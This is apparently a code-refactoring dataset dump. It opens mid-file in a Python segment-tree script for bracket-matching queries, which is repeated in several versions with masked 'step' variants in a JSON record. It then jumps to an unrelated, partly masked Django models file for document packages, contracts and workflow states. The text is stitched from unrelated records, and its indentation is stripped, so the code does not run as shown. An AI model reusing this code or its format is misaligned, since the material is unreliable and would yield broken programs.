return 0, 0, 0
elif start >= l and end <= r:
return st[i], openst[i], closedst[i]
else:
mid = (start + end) // 2
a, b, c = query(s, start, mid, l, r, st, 2 * i + 1)
d, e, f = query(s, mid + 1, end, l, r, st, 2 * i + 2)
tmp = min(b, f)
T = a + d + tmp
O = b + e - tmp
C = c + f - tmp
return T, O, C
s = input()
n = len(s)
x = int(ceil(log2(n)))
max_size = 2 * pow(2, x) - 1
st = [(0) for i in range(0, max_size)]
openst = [(0) for i in range(0, max_size)]
closedst = [(0) for i in range(0, max_size)]
constructST(s, 0, n - 1, st, 0)
for _ in range(int(input())):
l, r = map(int, input().split())
print(2 * query(s, 0, n - 1, l - 1, r - 1, st, 0)[0])
<|reserved_special_token_1|>
from math import ceil, log2, sqrt
def constructST(s, start, end, st, i):
if start == end:
st[i] = 0
openst[i] = 1 if s[start] == '(' else 0
closedst[i] = 1 if s[start] == ')' else 0
return st[i], openst[i], closedst[i]
else:
mid = (start + end) // 2
st[i], openst[i], closedst[i] = constructST(s, start, mid, st, 2 *
i + 1)
a, b, c = constructST(s, mid + 1, end, st, 2 * i + 2)
tmp = min(openst[2 * i + 1], closedst[2 * i + 2])
st[i] += tmp + a
openst[i] += b - tmp
closedst[i] += c - tmp
return st[i], openst[i], closedst[i]
def query(s, start, end, l, r, st, i):
if l > end or r < start:
return 0, 0, 0
elif start >= l and end <= r:
return st[i], openst[i], closedst[i]
else:
mid = (start + end) // 2
a, b, c = query(s, start, mid, l, r, st, 2 * i + 1)
d, e, f = query(s, mid + 1, end, l, r, st, 2 * i + 2)
tmp = min(b, f)
T = a + d + tmp
O = b + e - tmp
C = c + f - tmp
return T, O, C
s = input()
n = len(s)
x = int(ceil(log2(n)))
max_size = 2 * pow(2, x) - 1
st = [(0) for i in range(0, max_size)]
openst = [(0) for i in range(0, max_size)]
closedst = [(0) for i in range(0, max_size)]
constructST(s, 0, n - 1, st, 0)
for _ in range(int(input())):
l, r = map(int, input().split())
print(2 * query(s, 0, n - 1, l - 1, r - 1, st, 0)[0])
<|reserved_special_token_1|>
from math import ceil, log2, sqrt
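# Each segment-tree node keeps three counts for its range:
#   st[i]       - number of matched "()" pairs,
#   openst[i]   - unmatched '(' left over,
#   closedst[i] - unmatched ')' left over.
# A parent merges its children by pairing the left child's spare '(' with the
# right child's spare ')' (tmp below); queries combine partial results the
# same way, so each query reports the length of the longest balanced bracket
# subsequence in s[l..r] as 2 * matched pairs.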
def constructST(s, start, end, st, i):
if start == end:
st[i] = 0
openst[i] = 1 if s[start] == '(' else 0
closedst[i] = 1 if s[start] == ')' else 0
return st[i], openst[i], closedst[i]
else:
mid = (start+end)//2
st[i], openst[i], closedst[i] = constructST(s, start, mid, st, 2*i+1)
a, b, c = constructST(s, mid+1, end, st, 2*i+2)
tmp = min(openst[2*i+1], closedst[2*i+2])
st[i] += tmp + a
openst[i] += b-tmp
closedst[i] += c -tmp
return st[i], openst[i], closedst[i]
def query(s, start, end, l, r, st, i):
if l > end or r < start:
return 0, 0, 0
elif start >= l and end <= r:
return st[i], openst[i], closedst[i]
else:
mid = (start + end)//2
a, b, c = query(s, start, mid, l, r, st, 2*i+1)
d, e, f = query(s, mid+1, end, l, r, st, 2*i+2)
tmp = min(b, f)
T = a+d +tmp
O = b+e - tmp
C = c+f - tmp
return T, O, C
s = input()
n = len(s)
x = int(ceil(log2(n)))
max_size = 2*pow(2, x) -1
st = [0 for i in range(0, max_size)]
openst = [0 for i in range(0, max_size)]
closedst = [0 for i in range(0, max_size)]
constructST(s, 0, n-1, st, 0)
# print(st)
# print(openst)
# print(closedst)
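# Worked example (assumed input): for s = "(())(" the query "1 4" covers
# "(())" and prints 4, while "4 5" covers ")(" and prints 0, because the
# spare ')' precedes the spare '(' and the two can never be paired.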
for _ in range(int(input())):
l, r = map(int, input().split())
print(2*query(s, 0, n-1, l-1, r-1, st, 0)[0])
|
flexible
|
{
"blob_id": "ccc74f58eff3bb00f0be8c2c963de4208b7f0933",
"index": 9125,
"step-1": "<mask token>\n\n\ndef constructST(s, start, end, st, i):\n if start == end:\n st[i] = 0\n openst[i] = 1 if s[start] == '(' else 0\n closedst[i] = 1 if s[start] == ')' else 0\n return st[i], openst[i], closedst[i]\n else:\n mid = (start + end) // 2\n st[i], openst[i], closedst[i] = constructST(s, start, mid, st, 2 *\n i + 1)\n a, b, c = constructST(s, mid + 1, end, st, 2 * i + 2)\n tmp = min(openst[2 * i + 1], closedst[2 * i + 2])\n st[i] += tmp + a\n openst[i] += b - tmp\n closedst[i] += c - tmp\n return st[i], openst[i], closedst[i]\n\n\ndef query(s, start, end, l, r, st, i):\n if l > end or r < start:\n return 0, 0, 0\n elif start >= l and end <= r:\n return st[i], openst[i], closedst[i]\n else:\n mid = (start + end) // 2\n a, b, c = query(s, start, mid, l, r, st, 2 * i + 1)\n d, e, f = query(s, mid + 1, end, l, r, st, 2 * i + 2)\n tmp = min(b, f)\n T = a + d + tmp\n O = b + e - tmp\n C = c + f - tmp\n return T, O, C\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\ndef constructST(s, start, end, st, i):\n if start == end:\n st[i] = 0\n openst[i] = 1 if s[start] == '(' else 0\n closedst[i] = 1 if s[start] == ')' else 0\n return st[i], openst[i], closedst[i]\n else:\n mid = (start + end) // 2\n st[i], openst[i], closedst[i] = constructST(s, start, mid, st, 2 *\n i + 1)\n a, b, c = constructST(s, mid + 1, end, st, 2 * i + 2)\n tmp = min(openst[2 * i + 1], closedst[2 * i + 2])\n st[i] += tmp + a\n openst[i] += b - tmp\n closedst[i] += c - tmp\n return st[i], openst[i], closedst[i]\n\n\ndef query(s, start, end, l, r, st, i):\n if l > end or r < start:\n return 0, 0, 0\n elif start >= l and end <= r:\n return st[i], openst[i], closedst[i]\n else:\n mid = (start + end) // 2\n a, b, c = query(s, start, mid, l, r, st, 2 * i + 1)\n d, e, f = query(s, mid + 1, end, l, r, st, 2 * i + 2)\n tmp = min(b, f)\n T = a + d + tmp\n O = b + e - tmp\n C = c + f - tmp\n return T, O, C\n\n\n<mask token>\nconstructST(s, 0, n - 1, st, 0)\nfor _ in range(int(input())):\n l, r = map(int, input().split())\n print(2 * query(s, 0, n - 1, l - 1, r - 1, st, 0)[0])\n",
"step-3": "<mask token>\n\n\ndef constructST(s, start, end, st, i):\n if start == end:\n st[i] = 0\n openst[i] = 1 if s[start] == '(' else 0\n closedst[i] = 1 if s[start] == ')' else 0\n return st[i], openst[i], closedst[i]\n else:\n mid = (start + end) // 2\n st[i], openst[i], closedst[i] = constructST(s, start, mid, st, 2 *\n i + 1)\n a, b, c = constructST(s, mid + 1, end, st, 2 * i + 2)\n tmp = min(openst[2 * i + 1], closedst[2 * i + 2])\n st[i] += tmp + a\n openst[i] += b - tmp\n closedst[i] += c - tmp\n return st[i], openst[i], closedst[i]\n\n\ndef query(s, start, end, l, r, st, i):\n if l > end or r < start:\n return 0, 0, 0\n elif start >= l and end <= r:\n return st[i], openst[i], closedst[i]\n else:\n mid = (start + end) // 2\n a, b, c = query(s, start, mid, l, r, st, 2 * i + 1)\n d, e, f = query(s, mid + 1, end, l, r, st, 2 * i + 2)\n tmp = min(b, f)\n T = a + d + tmp\n O = b + e - tmp\n C = c + f - tmp\n return T, O, C\n\n\ns = input()\nn = len(s)\nx = int(ceil(log2(n)))\nmax_size = 2 * pow(2, x) - 1\nst = [(0) for i in range(0, max_size)]\nopenst = [(0) for i in range(0, max_size)]\nclosedst = [(0) for i in range(0, max_size)]\nconstructST(s, 0, n - 1, st, 0)\nfor _ in range(int(input())):\n l, r = map(int, input().split())\n print(2 * query(s, 0, n - 1, l - 1, r - 1, st, 0)[0])\n",
"step-4": "from math import ceil, log2, sqrt\n\n\ndef constructST(s, start, end, st, i):\n if start == end:\n st[i] = 0\n openst[i] = 1 if s[start] == '(' else 0\n closedst[i] = 1 if s[start] == ')' else 0\n return st[i], openst[i], closedst[i]\n else:\n mid = (start + end) // 2\n st[i], openst[i], closedst[i] = constructST(s, start, mid, st, 2 *\n i + 1)\n a, b, c = constructST(s, mid + 1, end, st, 2 * i + 2)\n tmp = min(openst[2 * i + 1], closedst[2 * i + 2])\n st[i] += tmp + a\n openst[i] += b - tmp\n closedst[i] += c - tmp\n return st[i], openst[i], closedst[i]\n\n\ndef query(s, start, end, l, r, st, i):\n if l > end or r < start:\n return 0, 0, 0\n elif start >= l and end <= r:\n return st[i], openst[i], closedst[i]\n else:\n mid = (start + end) // 2\n a, b, c = query(s, start, mid, l, r, st, 2 * i + 1)\n d, e, f = query(s, mid + 1, end, l, r, st, 2 * i + 2)\n tmp = min(b, f)\n T = a + d + tmp\n O = b + e - tmp\n C = c + f - tmp\n return T, O, C\n\n\ns = input()\nn = len(s)\nx = int(ceil(log2(n)))\nmax_size = 2 * pow(2, x) - 1\nst = [(0) for i in range(0, max_size)]\nopenst = [(0) for i in range(0, max_size)]\nclosedst = [(0) for i in range(0, max_size)]\nconstructST(s, 0, n - 1, st, 0)\nfor _ in range(int(input())):\n l, r = map(int, input().split())\n print(2 * query(s, 0, n - 1, l - 1, r - 1, st, 0)[0])\n",
"step-5": "from math import ceil, log2, sqrt\r\n\r\ndef constructST(s, start, end, st, i):\r\n\tif start == end:\r\n\t\tst[i] = 0\r\n\t\topenst[i] = 1 if s[start] == '(' else 0\r\n\t\tclosedst[i] = 1 if s[start] == ')' else 0\r\n\t\treturn st[i], openst[i], closedst[i]\r\n\r\n\telse:\r\n\t\tmid = (start+end)//2\r\n\t\tst[i], openst[i], closedst[i] = constructST(s, start, mid, st, 2*i+1) \r\n\t\ta, b, c = constructST(s, mid+1, end, st, 2*i+2)\r\n\t\ttmp = min(openst[2*i+1], closedst[2*i+2])\r\n\t\tst[i] += tmp + a\r\n\t\topenst[i] += b-tmp\r\n\t\tclosedst[i] += c -tmp\r\n\r\n\t\treturn st[i], openst[i], closedst[i]\r\n\r\ndef query(s, start, end, l, r, st, i):\r\n\tif l > end or r < start:\r\n\t\treturn 0, 0, 0\r\n\telif start >= l and end <= r:\r\n\t\treturn st[i], openst[i], closedst[i]\r\n\telse:\r\n\t\tmid = (start + end)//2\r\n\t\ta, b, c = query(s, start, mid, l, r, st, 2*i+1) \r\n\t\td, e, f = query(s, mid+1, end, l, r, st, 2*i+2)\r\n\t\ttmp = min(b, f)\r\n\t\tT = a+d +tmp\r\n\t\tO = b+e - tmp\r\n\t\tC = c+f - tmp\r\n\treturn T, O, C\r\n\r\n\r\n\r\ns = input()\r\nn = len(s)\r\nx = int(ceil(log2(n)))\r\nmax_size = 2*pow(2, x) -1\t\r\n\r\nst = [0 for i in range(0, max_size)]\r\nopenst = [0 for i in range(0, max_size)]\r\nclosedst = [0 for i in range(0, max_size)]\r\n\r\nconstructST(s, 0, n-1, st, 0)\r\n# print(st)\r\n# print(openst)\r\n# print(closedst)\r\nfor _ in range(int(input())):\r\n\tl, r = map(int, input().split())\r\n\tprint(2*query(s, 0, n-1, l-1, r-1, st, 0)[0])\r\n",
"step-ids": [
2,
3,
4,
5,
6
]
}
|
[
2,
3,
4,
5,
6
] |
<|reserved_special_token_0|>
class ActExam(models.Model):
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_0|>
@classmethod
def get_files_path(cls, package: 'DocumentsPackage'):
tmp_path = package.get_save_path()
ActExam.initialize_folder(tmp_path)
return os.path.join(tmp_path, cls.FOLDER)
def clear_file(self):
if os.path.exists(str_add_app(self.file_path)):
os.remove(str_add_app(self.file_path))
self.file_path = None
self.file_name = None
self.save()
def delete(self, using=None, keep_parents=False):
self.clear_file()
return super().delete(using=using, keep_parents=keep_parents)
class DocumentsPackage(models.Model):
""" Модель пакета документов.
contragent - ID контрагента
name_uuid - Уникальный ID пакета (каждый раз новый)
is_active - Является ли пакет активным. Если True, то пакет в работе. Если
False, то пакет закрыт.
is_automatic - Создан ли пакет автоматически или пользователь может
редактировать наборы файлов и некоторые характеристики. Если
True, то нельзя подгружать свои договора и редактировать
debt_plan. Если False, то редактирование возможно.
creation_date - Дата создания пакета.
debt_plan - Сумма долга. Если is_automatic == True, то значение не
редактируется. Если is_automatic == False, то значение
необходимо заполнить.
debt_fact - Сумма долга по факту. Заполняется при сторнировании или оплате.
tax_count - Госпошлина. Можно заполнять в любом случае.
package_users - Все пользователи пакета, работавшие с ним.
package_state - Состояние пакета.
package_state_date - Дата изменения состояния пакета.
single_files - Пакет одиночных документов.
pack_files - Пакет наборов файлов.
other_files - Произвольные файлы.
commentary - Комментарии.
"""
contragent = models.ForeignKey(Contragent, on_delete=models.CASCADE,
related_name='contragents', related_query_name='contragent', null=
True, blank=True)
name_uuid = models.CharField('Идентификатор пакета', max_length=255,
default=uuid.uuid4, null=True, blank=True, editable=False)
is_active = models.BooleanField('Активный пакет', default=True)
is_automatic = models.BooleanField('Создан автоматически', default=True)
creation_date = models.DateField('Дата создания пакета', auto_now_add=True)
debt_plan = models.FloatField('Сумма задолжности (плановая)', default=0.0)
debt_fact = models.FloatField('Сумма задолжности (фактическая)',
default=0.0)
tax_count = models.FloatField('Госпошлина', default=0.0)
package_users = models.ManyToManyField(settings.AUTH_USER_MODEL,
related_name='packages')
package_state = models.ForeignKey('State', on_delete=models.CASCADE,
null=True, blank=True)
package_state_date = models.DateField('Дата последнего действия', null=
True, blank=True)
single_files = GenericRelation(SingleFile)
pack_files = GenericRelation(PackFile)
other_files = GenericRelation(OtherFile)
commentary = GenericRelation(Commentary, related_query_name='package')
act = models.ForeignKey(ActExam, on_delete=models.CASCADE, null=True,
blank=True)
def __str__(self):
return f'Пакет {self.name_uuid}'
def get_save_path(self):
if self.contragent:
return os.path.join(self.contragent.get_str_as_path(), str(self
.name_uuid))
else:
return f'{self.name_uuid}'
@classmethod
def get_active_package(cls, contragent: Contragent):
try:
res = cls.objects.get(contragent__id=contragent.pk, is_active=True)
return res
except ObjectDoesNotExist:
return None
def initialize_sub_folders(self):
os.makedirs(str(self.get_save_path()), exist_ok=True)
def is_user_in_package(self, user, use_department=False):
users = self.package_users.all()
if use_department:
depts = [tmp_user.department for tmp_user in users]
return user.department in depts or user in users
return user in users
def set_inactive(self):
self.is_active = False
self.save()
def change_state_to(self, new_state, is_backward):
self.package_state = new_state
self.package_state_date = datetime.date.today()
if not is_backward:
async_task(calc_create_gen_async, self.contragent, self, False,
group=self.name_uuid)
self.save()
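    # Note: a forward transition queues asynchronous document generation for
    # this package (async_task, presumably django-q, grouped by name_uuid);
    # a backward transition only records the new state and its date.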
class Meta:
verbose_name_plural = 'Пакеты документов'
class DocumentStateEntity(models.Model):
documents = models.ManyToManyField('DocumentTypeModel', related_name=
'document_type')
states = models.ForeignKey('State', related_name='states', on_delete=
models.CASCADE, blank=True, null=True)
template = models.ForeignKey('DocumentFileTemplate', on_delete=models.
CASCADE, blank=True, null=True)
class DocumentFileTemplate(models.Model):
contagent_type = models.IntegerField(choices=KLASS_TYPES, default=0)
is_package = models.BooleanField('Набор файлов', default=False)
def __str__(self):
return KLASS_TYPES[self.contagent_type][1]
class Meta:
verbose_name_plural = 'Шаблоны файлов'
class NormativeCategory(models.Model):
""" Класс Категории норматива """
name = models.CharField('Вид объекта', max_length=255)
norm_type = models.IntegerField('Показатель расчета', default=0,
choices=NORM_TYPE, blank=True, null=True)
normative = models.ManyToManyField('Normative', related_name=
'normatives', verbose_name='Нормативы')
def __str__(self):
return self.name
@property
def print_norm_type(self):
return NORM_TYPE[self.norm_type][1]
class Meta:
verbose_name_plural = 'Категории нормативов'
class Normative(models.Model):
""" Класс норматива """
since_date = models.DateField('Дата начала действия норматива', null=
True, blank=True)
up_to_date = models.DateField('Дата окончания действия норматива', null
=True, blank=True)
value = models.FloatField('Значение норматива (год.)', null=True, blank
=True)
def __str__(self):
return (f'Норматив: {self.value}/год.,' +
f" действующий с {self.since_date.strftime('%d.%m.%Y')}" +
f" по {self.up_to_date.strftime('%d.%m.%Y')}")
class Meta:
verbose_name_plural = 'Нормативы'
class Contract(models.Model):
""" Класс контракта. Нужен что бы получать уникальный номер контракта.
Сохраняет дату когда был создан, для корректной генерации строкового
представления.
"""
date_field = models.DateField(auto_now_add=True)
def __str__(self):
return f'{self.pk:06}-{self.date_field.year}/ТКО/01'
class Meta:
verbose_name_plural = 'Сгенерированые номера договоров'
class ContractNumberClass(models.Model):
""" Модель класса прокси для соединения класса документа и контрагента.
Принимает на вход необязательные параметры:
new - определяем, надо генерировать новый номер или есть
старый. Булево значение. True = генерируем;
exist_number - существующий номер договора. Строка;
У класса есть такие поля как:
is_generated - хранит булево значение. Определяет был ли сгенерирован
номер или взят из внешних источников;
contract_obj - объект модели самого номера контракта;
contract_exist_number - существующий номер контракта. Пустая строка,
если мы сгенерировали новый номер;
contract_number - возвращает строковое представление номера, независимо
от того, сгенерирован код или получен из внешнего
источника.
"""
is_generated = models.BooleanField(default=False)
contract_obj = models.OneToOneField(Contract, on_delete=models.CASCADE,
null=True, blank=True)
contract_exist_number = models.CharField(default='', max_length=255,
null=True, blank=True)
@classmethod
def create(cls, new: bool=False, exist_number: str=''):
contract_num_obj = cls(is_generated=new)
if new:
contract_num_obj.contract_obj = Contract.objects.create()
else:
contract_num_obj.contract_exist_number = exist_number
contract_num_obj.save()
return contract_num_obj
@property
def contract_number(self):
if self.is_generated:
return str(self.contract_obj)
else:
return self.contract_exist_number
def __str__(self):
return self.contract_number
class Meta:
verbose_name_plural = 'Номера договоров'
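# Usage sketch (assumed call sites, not shown in this module):
#   generated = ContractNumberClass.create(new=True)   # mints a Contract row
#   external = ContractNumberClass.create(exist_number='000123-2020/TKO/01')
# str(obj) / obj.contract_number yields the right representation either way.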
class SyncUniqueNumber(models.Model):
def __str__(self):
return f'{self.pk:08}/01'
class Meta:
verbose_name_plural = 'Номера документов'
class CityModel(models.Model):
name = models.CharField('Город', max_length=255, null=True, blank=True)
def __str__(self):
return self.name
class Meta:
verbose_name_plural = 'Города'
class TemplateModel(models.Model):
template_path = models.CharField('Путь до шаблона', max_length=255)
city = models.ForeignKey(CityModel, on_delete=models.CASCADE)
contragent_type = models.IntegerField('Тип контрагента', choices=
KLASS_TYPES, default=0)
document_type = models.ForeignKey('DocumentTypeModel', verbose_name=
'Тип документа', on_delete=models.CASCADE)
def __str__(self):
return (
f'{str(self.document_type)}| {KLASS_TYPES[self.contragent_type][1]}|{self.city}'
)
class Meta:
verbose_name_plural = 'Шаблоны документов'
class DocumentTypeModel(models.Model):
doc_type = models.CharField('Тип документа', max_length=255, null=True,
blank=True)
is_pack = models.BooleanField('Пакет документов', default=False)
def __str__(self):
return self.doc_type
class Meta:
verbose_name_plural = 'Типы документов'
class State(models.Model):
name_state = models.CharField('Состояние', max_length=255)
departments = models.ManyToManyField('yellowbird.Department',
verbose_name='Отделы', related_name='available_states')
is_initial_state = models.BooleanField('Начальное состояние', default=False
)
is_final_state = models.BooleanField('Конечное состояние', default=False)
def get_linked_events(self):
return Event.objects.filter(from_state=self.id)
def _is_dept_permitted(self, department):
return department in self.departments.all()
def is_permitted(self, user):
return user.is_superuser or user.is_staff or self._is_dept_permitted(
user.department)
def __str__(self):
return self.name_state
class Meta:
verbose_name_plural = 'Состояния'
class Event(models.Model):
name_event = models.CharField('Событие', max_length=255)
from_state = models.ForeignKey(State, on_delete=models.CASCADE,
verbose_name='Исходное состояние', blank=True, null=True,
related_name='begin_states')
to_state = models.ForeignKey(State, on_delete=models.CASCADE,
verbose_name='Конечное состояние', blank=True, null=True,
related_name='end_states')
is_move_backward = models.BooleanField('Двигаемся обратно назад',
default=False)
def __str__(self):
return self.name_event
class Meta:
verbose_name_plural = 'События'
class ListStrategy(ABC):
@abstractmethod
def execute_list_strategy(self, user):
raise NotImplementedError
@abstractmethod
def execute_single_strategy(self, pk, user):
raise NotImplementedError
class OnlyEmptyRecords(ListStrategy):
def execute_list_strategy(self, user):
contragents = Contragent.objects.all()
return [c for c in contragents if not c.active_package]
def execute_single_strategy(self, pk, user):
try:
res = Contragent.objects.get(pk=pk)
return res if not res.active_package else None
except Contragent.DoesNotExist:
return None
class OnlyMyRecordsStrategy(ListStrategy):
def execute_list_strategy(self, user):
        contragents = Contragent.objects.filter(current_user__contains=user)
return contragents
def execute_single_strategy(self, pk, user):
try:
            return Contragent.objects.get(pk=pk, current_user__contains=user)
except Contragent.DoesNotExist:
return None
class AllRecords(ListStrategy):
def execute_list_strategy(self, user):
contragents = Contragent.objects.all()
return contragents
def execute_single_strategy(self, pk, user):
try:
return Contragent.objects.get(pk=pk)
except Contragent.DoesNotExist:
return None
class AllInDepartmentRecords(ListStrategy):
def execute_list_strategy(self, user):
res = list()
contragents = Contragent.objects.all()
for c in contragents:
tmp_pack = c.get_active_package()
if tmp_pack:
tmp_state = tmp_pack.package_state
if tmp_state:
if tmp_state.is_permitted(user.department):
res.append(c)
else:
res.append(c)
else:
res.append(c)
return res
def execute_single_strategy(self, pk, user):
try:
contragent = Contragent.objects.get(pk=pk)
tmp_pack = contragent.get_active_package()
if tmp_pack:
tmp_list = [(c.department == user.department) for c in
contragent.current_user]
if any(tmp_list):
return contragent
return None
return contragent
except Contragent.DoesNotExist:
return None
class MyAndEmptyRecordsStrategy(ListStrategy):
def execute_list_strategy(self, user):
res = list()
contragents = Contragent.objects.all()
for c in contragents:
tmp_pack = c.get_active_package()
if tmp_pack:
tmp_state = tmp_pack.package_state
if tmp_state:
if tmp_state.is_permitted(user) and user in c.current_user:
res.append(c)
else:
res.append(c)
else:
res.append(c)
return res
def execute_single_strategy(self, pk, user):
try:
contragent = Contragent.objects.get(pk=pk)
tmp_pack = contragent.get_active_package()
if tmp_pack:
tmp_state = tmp_pack.package_state
if tmp_state:
if tmp_state.is_permitted(user
) and user in contragent.current_user:
return contragent
return contragent
except Contragent.DoesNotExist:
return None
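# Usage sketch (assumed caller): the strategies share one interface, so a
# view can pick one by the requesting user's role and call it uniformly:
#   strategy = AllRecords() if user.is_superuser else MyAndEmptyRecordsStrategy()
#   contragents = strategy.execute_list_strategy(user)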
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class SignUser(models.Model):
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_0|>
def __str__(self):
return f'{proper_last_name(self.name)}, {POST_TYPE[self.position][1]}'
<|reserved_special_token_0|>
class Meta:
verbose_name_plural = 'Отвественные лица с правом подписи'
class Commentary(models.Model):
user = models.ForeignKey(settings.AUTH_USER_MODEL, on_delete=models.
CASCADE, blank=True, null=True)
commentary_text = models.TextField('Комментарий', blank=True, null=True)
creation_date = models.DateTimeField('Дата создания', auto_now_add=True)
content_type = models.ForeignKey(ContentType, on_delete=models.CASCADE)
object_id = models.PositiveIntegerField()
content_object = GenericForeignKey('content_type', 'object_id')
class AbstractFileModel(models.Model):
file_name = models.CharField('Название файла', max_length=255, null=
True, blank=True)
file_path = models.CharField('Путь', max_length=255, blank=True, null=True)
creation_date = models.DateField('Дата создания файла', blank=True,
null=True)
content_type = models.ForeignKey(ContentType, on_delete=models.CASCADE)
object_id = models.PositiveIntegerField()
content_object = GenericForeignKey('content_type', 'object_id')
file_type = models.ForeignKey('DocumentTypeModel', on_delete=models.CASCADE
)
def delete(self, using=None, keep_parents=False):
if os.path.exists(str_add_app(self.file_path)):
os.remove(str_add_app(self.file_path))
return super().delete(using=using, keep_parents=keep_parents)
class Meta:
abstract = True
class SingleFile(AbstractFileModel):
def __str__(self):
return str(self.file_type)
class Meta:
verbose_name_plural = 'Единичные файлы'
class PackFile(AbstractFileModel):
unique_number = models.ForeignKey('SyncUniqueNumber', on_delete=models.
CASCADE, null=True, blank=True)
class Meta:
abstract = False
verbose_name_plural = 'Фаилы набора'
def initialize_folder(self, path: str):
if self.file_type:
tmp_str_path = plur_form(self.file_type.doc_type)
if not os.path.isdir(f'{path}/{tmp_str_path}/'):
os.makedirs(f'{path}/{tmp_str_path}/')
else:
raise AttributeError()
def get_files_path(self, package: 'DocumentsPackage'):
tmp_path = package.get_save_path()
self.initialize_folder(tmp_path)
return os.path.join(tmp_path, f'{plur_form(self.file_type.doc_type)}/')
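    # Note: files of this pack type are grouped in a per-type subfolder of
    # the package directory, named with the pluralised document type
    # (plur_form).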
<|reserved_special_token_0|>
class OtherFile(AbstractFileModel):
file_obj = models.FileField('Произвольные файлы', upload_to=
other_files_directory_path, max_length=500)
commentary = GenericRelation(Commentary, related_query_name='file')
class Meta:
verbose_name_plural = 'Прочие файлы'
class ActExam(models.Model):
FOLDER = 'Акт осмотра/'
file_path = models.CharField('Путь', max_length=255, blank=True, null=True)
file_name = models.CharField('Название файла', max_length=255, null=
True, blank=True)
@classmethod
def initialize_folder(cls, path: str):
tmp_path = f'{path}/{cls.FOLDER}'
if not os.path.isdir(tmp_path):
os.makedirs(tmp_path)
@classmethod
def get_files_path(cls, package: 'DocumentsPackage'):
tmp_path = package.get_save_path()
ActExam.initialize_folder(tmp_path)
return os.path.join(tmp_path, cls.FOLDER)
def clear_file(self):
if os.path.exists(str_add_app(self.file_path)):
os.remove(str_add_app(self.file_path))
self.file_path = None
self.file_name = None
self.save()
def delete(self, using=None, keep_parents=False):
self.clear_file()
return super().delete(using=using, keep_parents=keep_parents)
class DocumentsPackage(models.Model):
""" Модель пакета документов.
contragent - ID контрагента
name_uuid - Уникальный ID пакета (каждый раз новый)
is_active - Является ли пакет активным. Если True, то пакет в работе. Если
False, то пакет закрыт.
is_automatic - Создан ли пакет автоматически или пользователь может
редактировать наборы файлов и некоторые характеристики. Если
True, то нельзя подгружать свои договора и редактировать
debt_plan. Если False, то редактирование возможно.
creation_date - Дата создания пакета.
debt_plan - Сумма долга. Если is_automatic == True, то значение не
редактируется. Если is_automatic == False, то значение
необходимо заполнить.
debt_fact - Сумма долга по факту. Заполняется при сторнировании или оплате.
tax_count - Госпошлина. Можно заполнять в любом случае.
package_users - Все пользователи пакета, работавшие с ним.
package_state - Состояние пакета.
package_state_date - Дата изменения состояния пакета.
single_files - Пакет одиночных документов.
pack_files - Пакет наборов файлов.
other_files - Произвольные файлы.
commentary - Комментарии.
"""
contragent = models.ForeignKey(Contragent, on_delete=models.CASCADE,
related_name='contragents', related_query_name='contragent', null=
True, blank=True)
name_uuid = models.CharField('Идентификатор пакета', max_length=255,
default=uuid.uuid4, null=True, blank=True, editable=False)
is_active = models.BooleanField('Активный пакет', default=True)
is_automatic = models.BooleanField('Создан автоматически', default=True)
creation_date = models.DateField('Дата создания пакета', auto_now_add=True)
debt_plan = models.FloatField('Сумма задолжности (плановая)', default=0.0)
debt_fact = models.FloatField('Сумма задолжности (фактическая)',
default=0.0)
tax_count = models.FloatField('Госпошлина', default=0.0)
package_users = models.ManyToManyField(settings.AUTH_USER_MODEL,
related_name='packages')
package_state = models.ForeignKey('State', on_delete=models.CASCADE,
null=True, blank=True)
package_state_date = models.DateField('Дата последнего действия', null=
True, blank=True)
single_files = GenericRelation(SingleFile)
pack_files = GenericRelation(PackFile)
other_files = GenericRelation(OtherFile)
commentary = GenericRelation(Commentary, related_query_name='package')
act = models.ForeignKey(ActExam, on_delete=models.CASCADE, null=True,
blank=True)
def __str__(self):
return f'Пакет {self.name_uuid}'
def get_save_path(self):
if self.contragent:
return os.path.join(self.contragent.get_str_as_path(), str(self
.name_uuid))
else:
return f'{self.name_uuid}'
@classmethod
def get_active_package(cls, contragent: Contragent):
try:
res = cls.objects.get(contragent__id=contragent.pk, is_active=True)
return res
except ObjectDoesNotExist:
return None
def initialize_sub_folders(self):
os.makedirs(str(self.get_save_path()), exist_ok=True)
def is_user_in_package(self, user, use_department=False):
users = self.package_users.all()
if use_department:
depts = [tmp_user.department for tmp_user in users]
return user.department in depts or user in users
return user in users
def set_inactive(self):
self.is_active = False
self.save()
def change_state_to(self, new_state, is_backward):
self.package_state = new_state
self.package_state_date = datetime.date.today()
if not is_backward:
async_task(calc_create_gen_async, self.contragent, self, False,
group=self.name_uuid)
self.save()
class Meta:
verbose_name_plural = 'Пакеты документов'
class DocumentStateEntity(models.Model):
documents = models.ManyToManyField('DocumentTypeModel', related_name=
'document_type')
states = models.ForeignKey('State', related_name='states', on_delete=
models.CASCADE, blank=True, null=True)
template = models.ForeignKey('DocumentFileTemplate', on_delete=models.
CASCADE, blank=True, null=True)
class DocumentFileTemplate(models.Model):
contagent_type = models.IntegerField(choices=KLASS_TYPES, default=0)
is_package = models.BooleanField('Набор файлов', default=False)
def __str__(self):
return KLASS_TYPES[self.contagent_type][1]
class Meta:
verbose_name_plural = 'Шаблоны файлов'
class NormativeCategory(models.Model):
""" Класс Категории норматива """
name = models.CharField('Вид объекта', max_length=255)
norm_type = models.IntegerField('Показатель расчета', default=0,
choices=NORM_TYPE, blank=True, null=True)
normative = models.ManyToManyField('Normative', related_name=
'normatives', verbose_name='Нормативы')
def __str__(self):
return self.name
@property
def print_norm_type(self):
return NORM_TYPE[self.norm_type][1]
class Meta:
verbose_name_plural = 'Категории нормативов'
class Normative(models.Model):
""" Класс норматива """
since_date = models.DateField('Дата начала действия норматива', null=
True, blank=True)
up_to_date = models.DateField('Дата окончания действия норматива', null
=True, blank=True)
value = models.FloatField('Значение норматива (год.)', null=True, blank
=True)
def __str__(self):
return (f'Норматив: {self.value}/год.,' +
f" действующий с {self.since_date.strftime('%d.%m.%Y')}" +
f" по {self.up_to_date.strftime('%d.%m.%Y')}")
class Meta:
verbose_name_plural = 'Нормативы'
class Contract(models.Model):
""" Класс контракта. Нужен что бы получать уникальный номер контракта.
Сохраняет дату когда был создан, для корректной генерации строкового
представления.
"""
date_field = models.DateField(auto_now_add=True)
